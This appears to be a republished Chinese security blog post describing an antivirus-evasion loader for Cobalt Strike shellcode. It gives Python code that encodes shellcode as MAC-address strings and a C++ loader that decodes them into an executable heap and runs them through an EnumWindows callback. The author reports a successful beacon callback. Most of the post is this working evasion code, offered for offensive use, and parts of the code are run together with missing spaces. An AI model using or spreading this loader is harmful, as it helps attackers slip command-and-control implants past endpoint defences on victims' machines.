【免杀】 PY加密C++回调免杀CS shellcode
2022-8-26 14:16:45 Author: moonsec(查看原文) 阅读量:54 收藏

【免杀】 PY加密C++回调免杀CS shellcode

1简介:

首先是对shellcode的加密转换,再去c++转换回shellcode利用回调函数加载至内存加载shellcode

2编译步骤:

1.shellcode放到py加密进行转换,这里转换为mac

2.放到c++编译生成:

3.测试上线:

3代码分析:

1.加密部分:

defconvertToMAC(shellcode):    if len(shellcode) % 6 != 0:       print("\n[*] length:", len(shellcode) + (6 -(len(shellcode) % 6)))        addNullbyte = b"\x00" *(6 - (len(shellcode) % 6))        shellcode += addNullbyte               mac = []        for i in range(0,len(shellcode), 6):            tmp_mac = ""           for j in shellcode[i:i + 6]:                iflen(hex(j).replace("0x", "")) == 1:                   tmp_mac = tmp_mac + "0" + hex(j).replace("0x","").upper() + "-"                else:                   tmp_mac = tmp_mac + hex(j).replace("0x","").upper() + "-"                   mac.append(tmp_mac[:-1])                    return mac                               if __name__ == '__main__':    buf =b'''shellcode'''    u = convertToMAC(buf)    print(str(u).replace("'","\""))

加密自己看,都是生搬硬套了,就不装那个比了

2.C++代码分析:

#include<Windows.h>#include <iostream>#include<ip2string.h>#pragma comment(lib,"Ntdll.lib")

//将转换后的shellcode(shellcode->mac)constchar* mac_[] ={ 加密shellcode };

int main(){ HANDLE hc =HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);//在进程的虚拟地址空间中保留空间 void* SB = HeapAlloc(hc, 0, 0x100000);//申请内存 DWORD_PTR hptr = (DWORD_PTR)SB; int elems = sizeof(mac_)/ sizeof(mac_[0]); PCSTR Terminator = ""; for (int i = 0; i < elems; i++) {
if(RtlEthernetStringToAddressA(mac_[i], &Terminator,(DL_EUI48*)hptr) == STATUS_INVALID_PARAMETER) { printf("ERROR!"); return 0; } hptr += 6; } EnumWindows((WNDENUMPROC)SB, 0);

首先是ntdllR3应用层到R0内核调用的入口,Kernel32.dlluser32.dll中的所有win32API 最终都是调用ntdll.dll中的函数实现的。

ip2string.h头文件:

3.主函数流程:

首先创建辅助堆栈,这里是为了设置堆栈的代码可运行;

之后申请内存空间要多少;

DWORD_PTRhptr就是个指针,存放了SB的内存地址;

19行代码计算数组大小;

for解密

最后回调函数,说白了就是转到目标地址进行加载;

4总结:

C++免杀大体可以分为,加密,注入,远程线程,读取。并不难,但是免杀出的越来越多也会越来越难做正向加载的免杀,有条件学学pe直接改特征吧

5关注

公众号长期更新安全类文章,关注公众号,以便下次轻松查阅

觉得文章对你有帮助 请转发 点赞 收藏噢


文章来源: http://mp.weixin.qq.com/s?__biz=MzAwMjc0NTEzMw==&mid=2653579928&idx=1&sn=22905ae2aff1fefd4d46055a2f6d9a7f&chksm=811b7cdab66cf5ccbafb362c35c1fd9f0dfb196c37a205f38d996179d1f5f259615d21f06515#rd
如有侵权请联系:admin#unsafe.sh